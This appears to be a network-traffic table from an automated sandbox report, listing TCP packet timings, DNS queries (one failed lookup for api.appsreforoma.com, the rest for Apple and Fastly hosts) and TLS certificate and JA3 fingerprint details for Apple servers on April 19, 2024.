                                                                        Apr 19, 2024 11:45:18.960597992 CEST4434934917.248.193.16192.168.11.12
                                                                        Apr 19, 2024 11:45:18.960652113 CEST4434934917.248.193.16192.168.11.12
                                                                        Apr 19, 2024 11:45:18.960663080 CEST4434934917.248.193.16192.168.11.12
                                                                        Apr 19, 2024 11:45:18.960721016 CEST4434934917.248.193.16192.168.11.12
                                                                        Apr 19, 2024 11:45:18.960772038 CEST4434934917.248.193.16192.168.11.12
                                                                        Apr 19, 2024 11:45:18.962387085 CEST49349443192.168.11.1217.248.193.16
                                                                        Apr 19, 2024 11:45:18.962541103 CEST49349443192.168.11.1217.248.193.16
                                                                        Apr 19, 2024 11:45:18.962632895 CEST49349443192.168.11.1217.248.193.16
                                                                        Apr 19, 2024 11:45:18.963398933 CEST49349443192.168.11.1217.248.193.16
                                                                        Apr 19, 2024 11:45:18.997323036 CEST49350443192.168.11.12151.101.131.6
                                                                        Apr 19, 2024 11:45:19.015444994 CEST49349443192.168.11.1217.248.193.16
                                                                        Apr 19, 2024 11:45:19.022746086 CEST49352443192.168.11.12151.101.131.6
                                                                        Apr 19, 2024 11:45:19.156133890 CEST44349350151.101.131.6192.168.11.12
                                                                        Apr 19, 2024 11:45:19.156142950 CEST44349350151.101.131.6192.168.11.12
                                                                        Apr 19, 2024 11:45:19.156764984 CEST49350443192.168.11.12151.101.131.6
                                                                        Apr 19, 2024 11:45:19.182142973 CEST44349352151.101.131.6192.168.11.12
                                                                        Apr 19, 2024 11:45:19.182740927 CEST49352443192.168.11.12151.101.131.6
                                                                        Apr 19, 2024 11:45:19.184223890 CEST49352443192.168.11.12151.101.131.6
                                                                        Apr 19, 2024 11:45:19.278888941 CEST4434934917.248.193.16192.168.11.12
                                                                        Apr 19, 2024 11:45:19.279156923 CEST4434934917.248.193.16192.168.11.12
                                                                        Apr 19, 2024 11:45:19.279167891 CEST4434934917.248.193.16192.168.11.12
                                                                        Apr 19, 2024 11:45:19.280600071 CEST49349443192.168.11.1217.248.193.16
                                                                        Apr 19, 2024 11:45:19.280680895 CEST49349443192.168.11.1217.248.193.16
                                                                        Apr 19, 2024 11:45:19.303395033 CEST49349443192.168.11.1217.248.193.16
                                                                        Apr 19, 2024 11:45:19.303668976 CEST49349443192.168.11.1217.248.193.16
                                                                        Apr 19, 2024 11:45:19.303917885 CEST49349443192.168.11.1217.248.193.16
                                                                        Apr 19, 2024 11:45:19.303987026 CEST49349443192.168.11.1217.248.193.16
                                                                        Apr 19, 2024 11:45:19.304390907 CEST49349443192.168.11.1217.248.193.16
                                                                        Apr 19, 2024 11:45:19.343600035 CEST44349352151.101.131.6192.168.11.12
                                                                        Apr 19, 2024 11:45:19.345545053 CEST44349352151.101.131.6192.168.11.12
                                                                        Apr 19, 2024 11:45:19.345556974 CEST44349352151.101.131.6192.168.11.12
                                                                        Apr 19, 2024 11:45:19.345654964 CEST44349352151.101.131.6192.168.11.12
                                                                        Apr 19, 2024 11:45:19.345666885 CEST44349352151.101.131.6192.168.11.12
                                                                        Apr 19, 2024 11:45:19.345674992 CEST44349352151.101.131.6192.168.11.12
                                                                        Apr 19, 2024 11:45:19.347816944 CEST49352443192.168.11.12151.101.131.6
                                                                        Apr 19, 2024 11:45:19.347908020 CEST49352443192.168.11.12151.101.131.6
                                                                        Apr 19, 2024 11:45:19.347908020 CEST49352443192.168.11.12151.101.131.6
                                                                        Apr 19, 2024 11:45:19.349637032 CEST49352443192.168.11.12151.101.131.6
                                                                        Apr 19, 2024 11:45:19.358009100 CEST49352443192.168.11.12151.101.131.6
                                                                        Apr 19, 2024 11:45:19.522874117 CEST44349352151.101.131.6192.168.11.12
                                                                        Apr 19, 2024 11:45:19.523000956 CEST44349352151.101.131.6192.168.11.12
                                                                        Apr 19, 2024 11:45:19.524152040 CEST49352443192.168.11.12151.101.131.6
                                                                        Apr 19, 2024 11:45:19.572441101 CEST4434934917.248.193.16192.168.11.12
                                                                        Apr 19, 2024 11:45:19.572551012 CEST4434934917.248.193.16192.168.11.12
                                                                        Apr 19, 2024 11:45:19.572678089 CEST4434934917.248.193.16192.168.11.12
                                                                        Apr 19, 2024 11:45:19.572969913 CEST4434934917.248.193.16192.168.11.12
                                                                        Apr 19, 2024 11:45:19.573318958 CEST49349443192.168.11.1217.248.193.16
                                                                        Apr 19, 2024 11:45:19.573760986 CEST4434934917.248.193.16192.168.11.12
                                                                        Apr 19, 2024 11:45:19.582319975 CEST4434934917.248.193.16192.168.11.12
                                                                        Apr 19, 2024 11:45:19.582902908 CEST49349443192.168.11.1217.248.193.16
                                                                        Apr 19, 2024 11:45:19.591574907 CEST4434934917.248.193.16192.168.11.12
                                                                        Apr 19, 2024 11:45:19.592715025 CEST49349443192.168.11.1217.248.193.16
                                                                        Apr 19, 2024 11:45:19.600825071 CEST4434934917.248.193.16192.168.11.12
                                                                        Apr 19, 2024 11:45:19.610390902 CEST4434934917.248.193.16192.168.11.12
                                                                        Apr 19, 2024 11:45:19.611274004 CEST49349443192.168.11.1217.248.193.16
                                                                        Apr 19, 2024 11:45:19.619771004 CEST4434934917.248.193.16192.168.11.12
                                                                        Apr 19, 2024 11:45:19.620496988 CEST49349443192.168.11.1217.248.193.16
                                                                        Apr 19, 2024 11:45:19.628596067 CEST4434934917.248.193.16192.168.11.12
                                                                        Apr 19, 2024 11:45:19.638000011 CEST4434934917.248.193.16192.168.11.12
                                                                        Apr 19, 2024 11:45:19.638801098 CEST49349443192.168.11.1217.248.193.16
                                                                        Apr 19, 2024 11:45:19.647521973 CEST4434934917.248.193.16192.168.11.12
                                                                        Apr 19, 2024 11:45:19.648308039 CEST49349443192.168.11.1217.248.193.16
                                                                        Apr 19, 2024 11:45:19.656655073 CEST4434934917.248.193.16192.168.11.12
                                                                        Apr 19, 2024 11:45:19.665854931 CEST4434934917.248.193.16192.168.11.12
                                                                        Apr 19, 2024 11:45:19.666568995 CEST49349443192.168.11.1217.248.193.16
                                                                        Apr 19, 2024 11:45:19.684140921 CEST4434934917.248.193.16192.168.11.12
                                                                        Apr 19, 2024 11:45:19.684804916 CEST49349443192.168.11.1217.248.193.16
                                                                        Apr 19, 2024 11:45:19.693598032 CEST4434934917.248.193.16192.168.11.12
                                                                        Apr 19, 2024 11:45:19.694261074 CEST49349443192.168.11.1217.248.193.16
                                                                        Apr 19, 2024 11:45:19.702848911 CEST4434934917.248.193.16192.168.11.12
                                                                        Apr 19, 2024 11:45:19.703577042 CEST49349443192.168.11.1217.248.193.16
                                                                        Apr 19, 2024 11:45:19.712061882 CEST4434934917.248.193.16192.168.11.12
                                                                        Apr 19, 2024 11:45:19.713407040 CEST49349443192.168.11.1217.248.193.16
                                                                        Apr 19, 2024 11:45:19.721190929 CEST4434934917.248.193.16192.168.11.12
                                                                        Apr 19, 2024 11:45:19.722718000 CEST49349443192.168.11.1217.248.193.16
                                                                        Apr 19, 2024 11:45:19.842216969 CEST4434934917.248.193.16192.168.11.12
                                                                        Apr 19, 2024 11:45:19.842931032 CEST49349443192.168.11.1217.248.193.16
                                                                        Apr 19, 2024 11:45:19.846862078 CEST4434934917.248.193.16192.168.11.12
                                                                        Apr 19, 2024 11:45:19.847949028 CEST49349443192.168.11.1217.248.193.16
                                                                        Apr 19, 2024 11:45:19.856132984 CEST4434934917.248.193.16192.168.11.12
                                                                        Apr 19, 2024 11:45:19.856919050 CEST49349443192.168.11.1217.248.193.16
                                                                        Apr 19, 2024 11:45:19.865359068 CEST4434934917.248.193.16192.168.11.12
                                                                        Apr 19, 2024 11:45:19.866370916 CEST49349443192.168.11.1217.248.193.16
                                                                        Apr 19, 2024 11:45:19.972743988 CEST4434934917.248.193.16192.168.11.12
                                                                        Apr 19, 2024 11:45:19.974041939 CEST49349443192.168.11.1217.248.193.16
                                                                        Apr 19, 2024 11:45:19.974505901 CEST49349443192.168.11.1217.248.193.16
                                                                        Apr 19, 2024 11:45:21.000297070 CEST49349443192.168.11.1217.248.193.16
                                                                        Apr 19, 2024 11:45:21.269304037 CEST4434934917.248.193.16192.168.11.12
                                                                        Apr 19, 2024 11:45:22.193758011 CEST49327443192.168.11.1217.248.193.17
                                                                        Apr 19, 2024 11:45:22.194433928 CEST49327443192.168.11.1217.248.193.17
                                                                        Apr 19, 2024 11:45:22.456813097 CEST4434932717.248.193.17192.168.11.12
                                                                        Apr 19, 2024 11:45:22.457406044 CEST4434932717.248.193.17192.168.11.12
                                                                        Apr 19, 2024 11:45:22.457894087 CEST49327443192.168.11.1217.248.193.17
                                                                        Apr 19, 2024 11:45:22.620836020 CEST49349443192.168.11.1217.248.193.16
                                                                        Apr 19, 2024 11:45:22.626996040 CEST49349443192.168.11.1217.248.193.16
                                                                        Apr 19, 2024 11:45:22.889842033 CEST4434934917.248.193.16192.168.11.12
                                                                        Apr 19, 2024 11:45:22.890490055 CEST49349443192.168.11.1217.248.193.16
                                                                        Apr 19, 2024 11:45:22.896004915 CEST4434934917.248.193.16192.168.11.12
                                                                        Apr 19, 2024 11:45:55.198712111 CEST49388443192.168.11.12151.101.67.6
                                                                        Apr 19, 2024 11:45:55.198853016 CEST44349388151.101.67.6192.168.11.12
                                                                        Apr 19, 2024 11:45:55.199649096 CEST49388443192.168.11.12151.101.67.6
                                                                        Apr 19, 2024 11:45:55.200550079 CEST49388443192.168.11.12151.101.67.6
                                                                        Apr 19, 2024 11:45:55.200628042 CEST44349388151.101.67.6192.168.11.12
                                                                        Apr 19, 2024 11:45:55.549778938 CEST44349388151.101.67.6192.168.11.12
                                                                        Apr 19, 2024 11:45:55.550573111 CEST49388443192.168.11.12151.101.67.6
                                                                        Apr 19, 2024 11:45:55.550574064 CEST49388443192.168.11.12151.101.67.6
                                                                        Apr 19, 2024 11:45:55.571414948 CEST49388443192.168.11.12151.101.67.6
                                                                        Apr 19, 2024 11:45:55.571659088 CEST44349388151.101.67.6192.168.11.12
                                                                        Apr 19, 2024 11:45:55.572099924 CEST44349388151.101.67.6192.168.11.12
                                                                        Apr 19, 2024 11:45:55.572248936 CEST49388443192.168.11.12151.101.67.6
                                                                        Apr 19, 2024 11:45:55.572628021 CEST49388443192.168.11.12151.101.67.6
                                                                        Apr 19, 2024 11:45:55.601638079 CEST49389443192.168.11.12151.101.67.6
                                                                        Apr 19, 2024 11:45:55.601771116 CEST44349389151.101.67.6192.168.11.12
                                                                        Apr 19, 2024 11:45:55.602425098 CEST49389443192.168.11.12151.101.67.6
                                                                        Apr 19, 2024 11:45:55.603301048 CEST49389443192.168.11.12151.101.67.6
                                                                        Apr 19, 2024 11:45:55.603393078 CEST44349389151.101.67.6192.168.11.12
                                                                        Apr 19, 2024 11:45:55.888230085 CEST49390443192.168.11.12151.101.67.6
                                                                        Apr 19, 2024 11:45:55.888370991 CEST44349390151.101.67.6192.168.11.12
                                                                        Apr 19, 2024 11:45:55.889127970 CEST49390443192.168.11.12151.101.67.6
                                                                        Apr 19, 2024 11:45:55.890171051 CEST49390443192.168.11.12151.101.67.6
                                                                        Apr 19, 2024 11:45:55.890295982 CEST44349390151.101.67.6192.168.11.12
                                                                        Apr 19, 2024 11:45:55.949318886 CEST44349389151.101.67.6192.168.11.12
                                                                        Apr 19, 2024 11:45:55.951328039 CEST49389443192.168.11.12151.101.67.6
                                                                        Apr 19, 2024 11:45:55.951328039 CEST49389443192.168.11.12151.101.67.6
                                                                        Apr 19, 2024 11:45:55.957997084 CEST49389443192.168.11.12151.101.67.6
                                                                        Apr 19, 2024 11:45:55.958278894 CEST44349389151.101.67.6192.168.11.12
                                                                        Apr 19, 2024 11:45:55.958918095 CEST49389443192.168.11.12151.101.67.6
                                                                        Apr 19, 2024 11:45:55.958950043 CEST44349389151.101.67.6192.168.11.12
                                                                        Apr 19, 2024 11:45:55.959671974 CEST49389443192.168.11.12151.101.67.6
                                                                        Apr 19, 2024 11:45:55.977972984 CEST49391443192.168.11.12151.101.67.6
                                                                        Apr 19, 2024 11:45:55.978121042 CEST44349391151.101.67.6192.168.11.12
                                                                        Apr 19, 2024 11:45:55.978847980 CEST49391443192.168.11.12151.101.67.6
                                                                        Apr 19, 2024 11:45:55.979561090 CEST49391443192.168.11.12151.101.67.6
                                                                        Apr 19, 2024 11:45:55.979638100 CEST44349391151.101.67.6192.168.11.12
                                                                        Apr 19, 2024 11:45:56.322523117 CEST44349391151.101.67.6192.168.11.12
                                                                        Apr 19, 2024 11:45:56.324527979 CEST49391443192.168.11.12151.101.67.6
                                                                        Apr 19, 2024 11:45:56.324527979 CEST49391443192.168.11.12151.101.67.6
                                                                        Apr 19, 2024 11:45:56.331159115 CEST49391443192.168.11.12151.101.67.6
                                                                        Apr 19, 2024 11:45:56.331324100 CEST44349391151.101.67.6192.168.11.12
                                                                        Apr 19, 2024 11:45:56.331659079 CEST44349391151.101.67.6192.168.11.12
                                                                        Apr 19, 2024 11:45:56.332056999 CEST49391443192.168.11.12151.101.67.6
                                                                        Apr 19, 2024 11:45:56.332295895 CEST49391443192.168.11.12151.101.67.6
                                                                        Apr 19, 2024 11:45:56.345088959 CEST49392443192.168.11.12151.101.67.6
                                                                        Apr 19, 2024 11:45:56.345192909 CEST44349392151.101.67.6192.168.11.12
                                                                        Apr 19, 2024 11:45:56.345933914 CEST49392443192.168.11.12151.101.67.6
                                                                        Apr 19, 2024 11:45:56.346664906 CEST49392443192.168.11.12151.101.67.6
                                                                        Apr 19, 2024 11:45:56.346757889 CEST44349392151.101.67.6192.168.11.12
                                                                        Apr 19, 2024 11:45:56.693417072 CEST44349392151.101.67.6192.168.11.12
                                                                        Apr 19, 2024 11:45:56.694510937 CEST49392443192.168.11.12151.101.67.6
                                                                        Apr 19, 2024 11:45:56.694510937 CEST49392443192.168.11.12151.101.67.6
                                                                        Apr 19, 2024 11:45:56.705035925 CEST49392443192.168.11.12151.101.67.6
                                                                        Apr 19, 2024 11:45:56.705359936 CEST44349392151.101.67.6192.168.11.12
                                                                        Apr 19, 2024 11:45:56.705987930 CEST49392443192.168.11.12151.101.67.6
                                                                        Apr 19, 2024 11:45:57.244354963 CEST44349390151.101.67.6192.168.11.12
                                                                        Apr 19, 2024 11:45:57.245358944 CEST49390443192.168.11.12151.101.67.6
                                                                        Apr 19, 2024 11:45:57.245687962 CEST49390443192.168.11.12151.101.67.6
                                                                        Apr 19, 2024 11:45:57.266006947 CEST49390443192.168.11.12151.101.67.6
                                                                        Apr 19, 2024 11:45:57.266189098 CEST44349390151.101.67.6192.168.11.12
                                                                        Apr 19, 2024 11:45:57.266650915 CEST44349390151.101.67.6192.168.11.12
                                                                        Apr 19, 2024 11:45:57.266814947 CEST49390443192.168.11.12151.101.67.6
                                                                        Apr 19, 2024 11:45:57.267188072 CEST49390443192.168.11.12151.101.67.6
                                                                        Apr 19, 2024 11:45:57.333534002 CEST49393443192.168.11.12151.101.67.6
                                                                        Apr 19, 2024 11:45:57.333673954 CEST44349393151.101.67.6192.168.11.12
                                                                        Apr 19, 2024 11:45:57.334422112 CEST49393443192.168.11.12151.101.67.6
                                                                        Apr 19, 2024 11:45:57.336683035 CEST49393443192.168.11.12151.101.67.6
                                                                        Apr 19, 2024 11:45:57.336761951 CEST44349393151.101.67.6192.168.11.12
                                                                        Apr 19, 2024 11:45:57.680196047 CEST44349393151.101.67.6192.168.11.12
                                                                        Apr 19, 2024 11:45:57.681057930 CEST49393443192.168.11.12151.101.67.6
                                                                        Apr 19, 2024 11:45:57.681057930 CEST49393443192.168.11.12151.101.67.6
                                                                        Apr 19, 2024 11:45:57.695488930 CEST49393443192.168.11.12151.101.67.6
                                                                        Apr 19, 2024 11:45:57.695666075 CEST44349393151.101.67.6192.168.11.12
                                                                        Apr 19, 2024 11:45:57.695988894 CEST44349393151.101.67.6192.168.11.12
                                                                        Apr 19, 2024 11:45:57.696923018 CEST49393443192.168.11.12151.101.67.6
                                                                        Apr 19, 2024 11:45:57.697058916 CEST49393443192.168.11.12151.101.67.6
                                                                        Apr 19, 2024 11:45:59.213131905 CEST49399443192.168.11.12151.101.67.6
                                                                        Apr 19, 2024 11:45:59.213270903 CEST44349399151.101.67.6192.168.11.12
                                                                        Apr 19, 2024 11:45:59.214549065 CEST49399443192.168.11.12151.101.67.6
                                                                        Apr 19, 2024 11:45:59.215413094 CEST49399443192.168.11.12151.101.67.6
                                                                        Apr 19, 2024 11:45:59.215492964 CEST44349399151.101.67.6192.168.11.12
                                                                        Apr 19, 2024 11:45:59.547962904 CEST44349399151.101.67.6192.168.11.12
                                                                        Apr 19, 2024 11:45:59.548880100 CEST49399443192.168.11.12151.101.67.6
                                                                        Apr 19, 2024 11:45:59.548919916 CEST49399443192.168.11.12151.101.67.6
                                                                        Apr 19, 2024 11:45:59.557486057 CEST49399443192.168.11.12151.101.67.6
                                                                        Apr 19, 2024 11:45:59.557651997 CEST44349399151.101.67.6192.168.11.12
                                                                        Apr 19, 2024 11:45:59.557974100 CEST44349399151.101.67.6192.168.11.12
                                                                        Apr 19, 2024 11:45:59.558666945 CEST49399443192.168.11.12151.101.67.6
                                                                        Apr 19, 2024 11:45:59.558667898 CEST49399443192.168.11.12151.101.67.6
                                                                        Apr 19, 2024 11:46:16.924137115 CEST4934480192.168.11.1217.253.83.196
                                                                        Apr 19, 2024 11:46:17.083436966 CEST804934417.253.83.196192.168.11.12
                                                                        Apr 19, 2024 11:46:17.084343910 CEST4934480192.168.11.1217.253.83.196
                                                                        Apr 19, 2024 11:47:24.727986097 CEST49401443192.168.11.12151.101.195.6
                                                                        Apr 19, 2024 11:47:24.728127003 CEST44349401151.101.195.6192.168.11.12
                                                                        Apr 19, 2024 11:47:24.728878975 CEST49401443192.168.11.12151.101.195.6
                                                                        Apr 19, 2024 11:47:24.731817007 CEST49401443192.168.11.12151.101.195.6
                                                                        Apr 19, 2024 11:47:24.731954098 CEST44349401151.101.195.6192.168.11.12
                                                                        Apr 19, 2024 11:47:25.077104092 CEST44349401151.101.195.6192.168.11.12
                                                                        Apr 19, 2024 11:47:25.078041077 CEST49401443192.168.11.12151.101.195.6
                                                                        Apr 19, 2024 11:47:25.078041077 CEST49401443192.168.11.12151.101.195.6
                                                                        Apr 19, 2024 11:47:25.084115982 CEST49401443192.168.11.12151.101.195.6
                                                                        Apr 19, 2024 11:47:25.084264040 CEST44349401151.101.195.6192.168.11.12
                                                                        Apr 19, 2024 11:47:25.084518909 CEST44349401151.101.195.6192.168.11.12
                                                                        Apr 19, 2024 11:47:25.085668087 CEST49401443192.168.11.12151.101.195.6
                                                                        Apr 19, 2024 11:47:25.085668087 CEST49401443192.168.11.12151.101.195.6
                                                                        Apr 19, 2024 11:47:25.100814104 CEST49402443192.168.11.12151.101.195.6
                                                                        Apr 19, 2024 11:47:25.100900888 CEST44349402151.101.195.6192.168.11.12
                                                                        Apr 19, 2024 11:47:25.101954937 CEST49402443192.168.11.12151.101.195.6
                                                                        Apr 19, 2024 11:47:25.102603912 CEST49402443192.168.11.12151.101.195.6
                                                                        Apr 19, 2024 11:47:25.102670908 CEST44349402151.101.195.6192.168.11.12
                                                                        Apr 19, 2024 11:47:25.450468063 CEST44349402151.101.195.6192.168.11.12
                                                                        Apr 19, 2024 11:47:25.451483965 CEST49402443192.168.11.12151.101.195.6
                                                                        Apr 19, 2024 11:47:25.451484919 CEST49402443192.168.11.12151.101.195.6
                                                                        Apr 19, 2024 11:47:25.459808111 CEST49402443192.168.11.12151.101.195.6
                                                                        Apr 19, 2024 11:47:25.460136890 CEST44349402151.101.195.6192.168.11.12
                                                                        Apr 19, 2024 11:47:25.460901976 CEST49402443192.168.11.12151.101.195.6
                                                                        Apr 19, 2024 11:47:25.460983038 CEST44349402151.101.195.6192.168.11.12
                                                                        Apr 19, 2024 11:47:25.461584091 CEST49402443192.168.11.12151.101.195.6
                                                                        Apr 19, 2024 11:47:25.482439041 CEST49403443192.168.11.12151.101.195.6
                                                                        Apr 19, 2024 11:47:25.482579947 CEST44349403151.101.195.6192.168.11.12
                                                                        Apr 19, 2024 11:47:25.483684063 CEST49403443192.168.11.12151.101.195.6
                                                                        Apr 19, 2024 11:47:25.484600067 CEST49403443192.168.11.12151.101.195.6
                                                                        Apr 19, 2024 11:47:25.484708071 CEST44349403151.101.195.6192.168.11.12
                                                                        Apr 19, 2024 11:47:25.829374075 CEST44349403151.101.195.6192.168.11.12
                                                                        Apr 19, 2024 11:47:25.830349922 CEST49403443192.168.11.12151.101.195.6
                                                                        Apr 19, 2024 11:47:25.830349922 CEST49403443192.168.11.12151.101.195.6
                                                                        Apr 19, 2024 11:47:25.837255955 CEST49403443192.168.11.12151.101.195.6
                                                                        Apr 19, 2024 11:47:25.837426901 CEST44349403151.101.195.6192.168.11.12
                                                                        Apr 19, 2024 11:47:25.837721109 CEST44349403151.101.195.6192.168.11.12
                                                                        Apr 19, 2024 11:47:25.838200092 CEST49403443192.168.11.12151.101.195.6
                                                                        Apr 19, 2024 11:47:25.838459969 CEST49403443192.168.11.12151.101.195.6
                                                                        Apr 19, 2024 11:47:25.853281021 CEST49404443192.168.11.12151.101.195.6
                                                                        Apr 19, 2024 11:47:25.853421926 CEST44349404151.101.195.6192.168.11.12
                                                                        Apr 19, 2024 11:47:25.854404926 CEST49404443192.168.11.12151.101.195.6
                                                                        Apr 19, 2024 11:47:25.855701923 CEST49404443192.168.11.12151.101.195.6
                                                                        Apr 19, 2024 11:47:25.855813026 CEST44349404151.101.195.6192.168.11.12
                                                                        Apr 19, 2024 11:47:26.205106020 CEST44349404151.101.195.6192.168.11.12
                                                                        Apr 19, 2024 11:47:26.207202911 CEST49404443192.168.11.12151.101.195.6
                                                                        Apr 19, 2024 11:47:26.207318068 CEST49404443192.168.11.12151.101.195.6
                                                                        Apr 19, 2024 11:47:26.214433908 CEST49404443192.168.11.12151.101.195.6
                                                                        Apr 19, 2024 11:47:26.214755058 CEST44349404151.101.195.6192.168.11.12
                                                                        Apr 19, 2024 11:47:26.215408087 CEST49404443192.168.11.12151.101.195.6
                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        Apr 19, 2024 11:45:26.312273026 CEST4978953192.168.11.121.1.1.1
                                                                        Apr 19, 2024 11:45:26.481062889 CEST53497891.1.1.1192.168.11.12
                                                                        Apr 19, 2024 11:45:41.428456068 CEST53524581.1.1.1192.168.11.12
                                                                        Apr 19, 2024 11:45:48.480866909 CEST5963953192.168.11.121.1.1.1
                                                                        Apr 19, 2024 11:45:55.029654026 CEST6184453192.168.11.121.1.1.1
                                                                        Apr 19, 2024 11:45:55.195477009 CEST53618441.1.1.1192.168.11.12
                                                                        Apr 19, 2024 11:47:24.558094978 CEST5830953192.168.11.121.1.1.1
                                                                        Apr 19, 2024 11:47:24.724334002 CEST53583091.1.1.1192.168.11.12
                                                                        TimestampSource IPDest IPChecksumCodeType
                                                                        Apr 19, 2024 11:45:47.546689987 CEST192.168.11.121.1.1.135ef(Port unreachable)Destination Unreachable
                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                        Apr 19, 2024 11:45:26.312273026 CEST192.168.11.121.1.1.10x317Standard query (0)api.appsreforoma.comA (IP address)IN (0x0001)false
                                                                        Apr 19, 2024 11:45:48.480866909 CEST192.168.11.121.1.1.10x615bStandard query (0)updates.cdn-apple.comA (IP address)IN (0x0001)false
                                                                        Apr 19, 2024 11:45:55.029654026 CEST192.168.11.121.1.1.10xfcc0Standard query (0)apis.apple.map.fastly.netA (IP address)IN (0x0001)false
                                                                        Apr 19, 2024 11:47:24.558094978 CEST192.168.11.121.1.1.10x376aStandard query (0)apis.apple.map.fastly.netA (IP address)IN (0x0001)false
                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                        Apr 19, 2024 11:45:18.418520927 CEST1.1.1.1192.168.11.120x146aNo error (0)gateway.fe2.apple-dns.net17.248.193.16A (IP address)IN (0x0001)false
                                                                        Apr 19, 2024 11:45:18.418520927 CEST1.1.1.1192.168.11.120x146aNo error (0)gateway.fe2.apple-dns.net17.248.193.20A (IP address)IN (0x0001)false
                                                                        Apr 19, 2024 11:45:18.418520927 CEST1.1.1.1192.168.11.120x146aNo error (0)gateway.fe2.apple-dns.net17.248.193.18A (IP address)IN (0x0001)false
                                                                        Apr 19, 2024 11:45:26.481062889 CEST1.1.1.1192.168.11.120x317Name error (3)api.appsreforoma.comnonenoneA (IP address)IN (0x0001)false
                                                                        Apr 19, 2024 11:45:48.641891003 CEST1.1.1.1192.168.11.120x615bNo error (0)updates.cdn-apple.comupdates.cdn-apple.com.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                        Apr 19, 2024 11:45:55.195477009 CEST1.1.1.1192.168.11.120xfcc0No error (0)apis.apple.map.fastly.net151.101.131.6A (IP address)IN (0x0001)false
                                                                        Apr 19, 2024 11:45:55.195477009 CEST1.1.1.1192.168.11.120xfcc0No error (0)apis.apple.map.fastly.net151.101.67.6A (IP address)IN (0x0001)false
                                                                        Apr 19, 2024 11:45:55.195477009 CEST1.1.1.1192.168.11.120xfcc0No error (0)apis.apple.map.fastly.net151.101.3.6A (IP address)IN (0x0001)false
                                                                        Apr 19, 2024 11:45:55.195477009 CEST1.1.1.1192.168.11.120xfcc0No error (0)apis.apple.map.fastly.net151.101.195.6A (IP address)IN (0x0001)false
                                                                        Apr 19, 2024 11:47:24.724334002 CEST1.1.1.1192.168.11.120x376aNo error (0)apis.apple.map.fastly.net151.101.195.6A (IP address)IN (0x0001)false
                                                                        Apr 19, 2024 11:47:24.724334002 CEST1.1.1.1192.168.11.120x376aNo error (0)apis.apple.map.fastly.net151.101.67.6A (IP address)IN (0x0001)false
                                                                        Apr 19, 2024 11:47:24.724334002 CEST1.1.1.1192.168.11.120x376aNo error (0)apis.apple.map.fastly.net151.101.3.6A (IP address)IN (0x0001)false
                                                                        Apr 19, 2024 11:47:24.724334002 CEST1.1.1.1192.168.11.120x376aNo error (0)apis.apple.map.fastly.net151.101.131.6A (IP address)IN (0x0001)false
                                                                        TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                        Apr 19, 2024 11:45:18.591979980 CEST151.101.131.6443192.168.11.1249347CN=bag.itunes.apple.com, O=Apple Inc., L=Cupertino, ST=California, C=US, SERIALNUMBER=C0806592, OID.1.3.6.1.4.1.311.60.2.1.2=California, OID.1.3.6.1.4.1.311.60.2.1.3=US, OID.2.5.4.15=Private Organization CN=Apple Public EV Server RSA CA 2 - G1, O=Apple Inc., C=USCN=Apple Public EV Server RSA CA 2 - G1, O=Apple Inc., C=US CN=DigiCert High Assurance EV Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USMon Nov 27 22:00:02 CET 2023 Wed Apr 29 14:54:50 CEST 2020Sat May 25 23:10:02 CEST 2024 Thu Apr 11 01:59:59 CEST 2030771,49196-49195-49188-49187-49162-49161-52393-49200-49199-49192-49191-49172-49171-52392-157-156-61-60-53-47-49160-49170-10,65281-0-23-13-5-13172-18-16-11-10,29-23-24-25,05c118da645babe52f060d0754256a73c
                                                                        CN=Apple Public EV Server RSA CA 2 - G1, O=Apple Inc., C=USCN=DigiCert High Assurance EV Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USWed Apr 29 14:54:50 CEST 2020Thu Apr 11 01:59:59 CEST 2030
                                                                        Apr 19, 2024 11:45:18.957603931 CEST151.101.131.6443192.168.11.1249350CN=bag.itunes.apple.com, O=Apple Inc., L=Cupertino, ST=California, C=US, SERIALNUMBER=C0806592, OID.1.3.6.1.4.1.311.60.2.1.2=California, OID.1.3.6.1.4.1.311.60.2.1.3=US, OID.2.5.4.15=Private Organization CN=Apple Public EV Server RSA CA 2 - G1, O=Apple Inc., C=USCN=Apple Public EV Server RSA CA 2 - G1, O=Apple Inc., C=US CN=DigiCert High Assurance EV Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USMon Nov 27 22:00:02 CET 2023 Wed Apr 29 14:54:50 CEST 2020Sat May 25 23:10:02 CEST 2024 Thu Apr 11 01:59:59 CEST 2030771,49196-49195-49188-49187-49162-49161-52393-49200-49199-49192-49191-49172-49171-52392-157-156-61-60-53-47-49160-49170-10,65281-0-23-13-5-13172-18-16-11-10,29-23-24-25,05c118da645babe52f060d0754256a73c
                                                                        CN=Apple Public EV Server RSA CA 2 - G1, O=Apple Inc., C=USCN=DigiCert High Assurance EV Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USWed Apr 29 14:54:50 CEST 2020Thu Apr 11 01:59:59 CEST 2030
                                                                        Apr 19, 2024 11:45:18.960721016 CEST17.248.193.16443192.168.11.1249349CN=gateway.icloud.com, O=Apple Inc., ST=California, C=US C=US, O=Apple Inc., OU=Certification Authority, CN=Apple IST CA 2 - G1 C=US, O=Apple Inc., OU=Certification Authority, CN=Apple IST CA 2 - G1C=US, O=Apple Inc., OU=Certification Authority, CN=Apple IST CA 2 - G1 CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE CN=Apple Root CA, OU=Apple Certification Authority, O=Apple Inc., C=USWed Nov 01 09:04:18 CET 2023 Wed Dec 12 13:00:00 CET 2018 Thu Apr 28 23:38:00 CEST 2022Sat Nov 30 09:04:17 CET 2024 Wed May 07 14:00:00 CEST 2025 Wed May 07 02:00:00 CEST 2025771,49196-49195-49188-49187-49162-49161-52393-49200-49199-49192-49191-49172-49171-52392-157-156-61-60-53-47-49160-49170-10,65281-0-23-13-5-13172-18-16-11-10,29-23-24-25,05c118da645babe52f060d0754256a73c
                                                                        C=US, O=Apple Inc., OU=Certification Authority, CN=Apple IST CA 2 - G1CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEWed Dec 12 13:00:00 CET 2018Wed May 07 14:00:00 CEST 2025
